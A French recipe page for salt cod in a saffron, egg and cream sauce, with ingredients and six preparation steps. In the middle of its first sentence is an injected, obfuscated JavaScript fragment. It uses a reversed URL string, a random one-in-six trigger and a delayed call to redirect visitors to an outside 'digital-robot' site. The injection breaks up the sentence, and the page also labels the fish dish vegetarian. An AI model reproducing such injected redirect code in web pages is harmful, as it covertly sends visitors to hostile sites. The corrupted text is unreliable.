Effeuillé de morue
2018-01-03- Cuisine : Poissons
- Thématique : Végétarien
- Niveau : Difficile
Enlevez l’excédent de sel des filets de morue en les frottant à l’aide d’un tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}torchon, puis plongez-les 24 heures dans une eau froide, en la changeant 2 à 3 fois.
Ingrédients
- Pour 4 personnes
- 2 filets de morue salée
- 25 cl de lait
- 25 cl de crème fleurette
- 2 gousses d’ail
- 4 jaunes d'œufs
- 8 cuillères à soupe d’huile d’olive
- 1 citron
- 1 cuillère à soupe d’alcool anisé
- ½ g de safran en poudre
- Sel - Poivre
Préparation de la recette
Etape 1
La préparation se fait la veille : Enlevez l'excédent de sel des filets de morue en les frottant à l'aide d'un torchon, puis plongez-les 24 heures dans une eau froide, en la changeant 2 à 3 fois.
Etape 2
Le lendemain dans l'autocuiseur, versez le lait, la crème, puis la morue. Fermez. Faites frémir sur feu doux sans faire bouillir pendant 10 minutes.
Etape 3
A ce moment ouvrez la cocotte et laissez en attente. Dans un bol mélangez les jaunes d'œufs, l'ail écrasée, le safran, versez l'huile d'olive sans cesser de fouettez avec un fouet
Etape 4
Retirez avec une passoire la morue en laissant le lait de cuisson dans la cocotte. Portez à ébullition et laissez réduire de 1/3.
Etape 5
Hors du feu incorporez la préparation aux œufs et bien mélanger. Replacez la cocotte sur feu très doux, et faites épaissir le mélange tout en remuant. Ajoutez le jus de citron et l'alcool anisé.
Etape 6
Vérifiez l'assaisonnement. Servez les filets de morue, napper de sauce et dégustez.
Note des membres
(0 / 5)
0 personne(s) ont noté cette recette